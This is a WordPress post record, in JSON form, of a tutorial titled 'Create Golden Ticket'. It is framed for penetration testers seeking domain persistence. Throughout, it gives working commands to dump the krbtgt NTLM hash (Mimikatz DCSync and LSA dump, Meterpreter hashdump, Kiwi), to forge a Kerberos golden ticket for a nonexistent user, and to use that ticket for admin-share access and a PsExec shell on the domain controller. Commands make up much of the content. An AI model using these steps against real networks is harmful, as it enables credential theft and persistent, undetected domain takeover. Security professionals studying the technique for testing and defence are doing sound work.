{"id":71,"date":"2020-05-28T18:21:37","date_gmt":"2020-05-28T10:21:37","guid":{"rendered":"https:\/\/byy3.com\/?p=71"},"modified":"2020-05-28T18:47:45","modified_gmt":"2020-05-28T10:47:45","slug":"create-golden-ticket","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=71","title":{"rendered":"Create Golden Ticket"},"content":{"rendered":"\n

Golden Ticket<\/h2>\n\n\n\n
Administrator\u00a0Post Exploitation\u00a0Golden Ticket,\u00a0kerberos,\u00a0kiwi,\u00a0krbtgt,\u00a0Metasploit,\u00a0Mimikatz\u00a04 Comments<\/p>\n\n\n\n
Network penetration tests usually stop when domain administrator access has been obtained by the consultant. However domain persistence might be necessary if there is project time to spent and there is a concern that access might be lost due to a variety of reasons such as:<\/p>\n\n\n\n
Change of compromised Domain Admin Password<\/li>
Detection of new domain administrator account<\/li><\/ul>\n\n\n\n
Benjamin Delpy\u00a0discovered the Golden Ticket attack and since then various articles have been written around this topic and threat actors (Bronze Butler) are using this attack for domain persistence. This technique leverages the lack of validation on the Kerberos authentication protocol in order to impersonate a particular user valid or invalid. This is due to the fact that users that have a TGT (ticket granting ticket) in their current session will consider trusted for Kerberos and therefore can access any resource in the network.<\/p>\n\n\n\n
Mimikatz<\/a> support the creation of a golden ticket and its meterpreter extension kiwi. Metasploit Framework has a post exploitation module<\/a> which can automate the activity. The creation of a golden ticket requires the following information:<\/p>\n\n\n\n
Domain Name<\/li>
Domain SID<\/li>
Username to impersonate<\/li>
krbtgt NTLM hash<\/li><\/ul>\n\n\n\n
Discovery of Golden Ticket Prerequisites<\/h2>\n\n\n\n
The Domain name and the domain SID can be obtained very easily by executing the whoami \/user<\/strong> command or with the use of PsGetsid<\/strong> utility from PsTools<\/a>.<\/p>\n\n\n\n
12<\/td> whoami \/user<\/code>PsGetsid<\/code>64<\/code>.exe pentestlab.<\/code>local<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Domain SID<\/p>\n\n\n\n The NTLM hash of the krbtgt<\/strong> account can be obtained via the following methods: <\/p>\n\n\n\n DCSync (Mimikatz)<\/li> LSA (Mimikatz)<\/li> Hashdump (Meterpreter)<\/li> NTDS.DIT<\/li> DCSync (Kiwi)<\/li><\/ol>\n\n\n\nThe DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn\u2019t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.<\/p>\n\n\n\n 1<\/td> lsadump::dcsync \/user:krbtgt<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Mimikatz \u2013 krbtgt NTLM Hash<\/p>\n\n\n\n Alternatively Mimikatz can retrieve the hash of the krbtgt account from the Local Security Authority (LSA) by executing Mimikatz on the domain controller.<\/p>\n\n\n\n 12<\/td> privilege::debug<\/code>lsadump::lsa \/inject \/name:krbtgt<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Mimikatz \u2013 krbtgt NTLM Hash via LSA Dump<\/p>\n\n\n\n If there is a Meterpreter session with the domain controller the quickest method is the hashdump<\/strong> command:<\/p>\n\n\n\n Meterpreter \u2013 krbtgt NTLM Hash<\/p>\n\n\n\n The Kiwi extension also supports the DCSync method and can retrieve the SID, LM and NTLM hashes.<\/p>\n\n\n\n 1<\/td> dcsync_ntlm krbtgt<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Metasploit Kiwi DCSync \u2013 Retrieve the NTLM Hash<\/p>\n\n\n\n Mimikatz<\/h2>\n\n\n\nA forged Golden ticket can be created with Mimikatz by using the obtained information.<\/p>\n\n\n\n 12<\/td> kerberos::golden \/user:evil \/domain:pentestlab.<\/code>local<\/code> \/sid:S<\/code>-1<\/code>-5<\/code>-21<\/code>-3737340914<\/code>-2019594255<\/code>-2413685307<\/code> \/krbtgt:d<\/code>125<\/code>e<\/code>4<\/code>f<\/code>69<\/code>c<\/code>851529045<\/code>ec<\/code>95<\/code>ca<\/code>80<\/code>fa<\/code>37<\/code>e<\/code>\/ticket:evil.tck \/ptt<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Mimikatz \u2013 Golden Ticket Creation<\/p>\n\n\n\n The kerberos::list<\/strong> command will retrieve all the available Kerberos tickets and the kerberos::tgt<\/strong> will list the ticket that has been submitted for the current user session.<\/p>\n\n\n\n 12<\/td> kerberos::list<\/code>kerberos::tgt<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Mimikatz \u2013 Kerberos Tickets<\/p>\n\n\n\n Since the ticket was generated with NTLM hash of the krbtgt<\/strong> account Kerberos will trust the ticket by default and therefore any user valid or invalid regardless of their privileges have unrestricted network access including access to the domain controller. This can be confirmed by listing the admin share on the domain controller.<\/p>\n\n\n\n 1<\/td> dir \\\\WIN-PTELU<\/code>2<\/code>U<\/code>07<\/code>KG\\C$<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Golden Ticket \u2013 Executing Commands on the Domain Controller as standard user<\/p>\n\n\n\n Attempts to list the same share as user test<\/strong> without the Golden Ticket will fail.<\/p>\n\n\n\n Listing DC Admin Share without Golden Ticket<\/p>\n\n\n\n Shell access to the domain controller is also possible with the use of the PsExec<\/strong> utility. Kerberos will grant access by using the ticket in the current session even though that the user \u2018evil\u2019<\/strong> is not valid.<\/p>\n\n\n\n 1<\/td> PsExec<\/code>64<\/code>.exe \\\\WIN-PTELU<\/code>2<\/code>U<\/code>07<\/code>KG\\ cmd.exe<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Golden Ticket \u2013 Shell with PsExec as invalid user<\/p>\n\n\n\n Examining the list of domain users on the domain controller it is visible that the user evil doesn\u2019t exist however he has domain administrator access.<\/p>\n\n\n\n Domain Users \u2013 Absence of evil user<\/p>\n\n\n\n It should be noted that the netbios name should be used for Kerberos authentication. Attempts to access the same resources with their correspondence IP addresses will fail with an access denied error since in this case NTLM authentication would be used and not the ticket.<\/p>\n\n\n\n Metasploit<\/h2>\n\n\n\nIn the scenario that domain administrator access has been obtained on the network and Metasploit Framework is used heavily in the assessment there is a Metasploit module which can automate the task of golden ticket.<\/p>\n\n\n\n 1<\/td> post\/windows\/escalate\/golden_ticket<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe module will try to obtain the required data automatically however since the information has been already retrieved it can be imported manually.<\/p>\n\n\n\n Metasploit \u2013 Golden Ticket Module Configuration<\/p>\n\n\n\n Metasploit will create, store and apply the ticket automatically to an existing Meterpreter session.<\/p>\n\n\n\n Metasploit \u2013 Golden Ticket<\/p>\n\n\n\n Kiwi<\/h2>\n\n\n\nMimikatz has been ported to Metasploit Framework as an extension called kiwi. From a Meterpreter session Kiwi can be loaded by running the following:<\/p>\n\n\n\n 1<\/td> meterpreter > load kiwi<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nThe Golden Ticket can be created with kiwi by executing the following command:<\/p>\n\n\n\n 12<\/td> golden_ticket_create -d pentestlab.<\/code>local<\/code> -u pentestlabuser -s S<\/code>-1<\/code>-5<\/code>-21<\/code>-3737340914<\/code>-2019594255<\/code>-2413685307<\/code>-k d<\/code>125<\/code>e<\/code>4<\/code>f<\/code>69<\/code>c<\/code>851529045<\/code>ec<\/code>95<\/code>ca<\/code>80<\/code>fa<\/code>37<\/code>e -t \/root\/Downloads\/pentestlabuser.tck<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Metasploit Kiwi \u2013 Golden Ticket<\/p>\n\n\n\n In order to apply the ticket to the existing session the kerberos_ticket_use<\/strong> needs to be used:<\/p>\n\n\n\n 1<\/td> kerberos_ticket_use \/root\/Downloads\/pentestlabuser.tck<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nVerification that there is a Kerberos ticket for the current session<\/p>\n\n\n\n 1<\/td> kerberos_ticket_list<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n Metasploit Kiwi \u2013 List of Kerberos Tickets<\/p>\n\n\n\n Resources can be accessed on the domain controller as pentestlabuser which is an account that doesn\u2019t exist.<\/p>\n","protected":false},"excerpt":{"rendered":" Golden Ticket Administrator\u00a0Post Exploitation\u00a0Golden Ti […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[10],"class_list":["post-71","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-golden-ticket"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/71","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=71"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/71\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}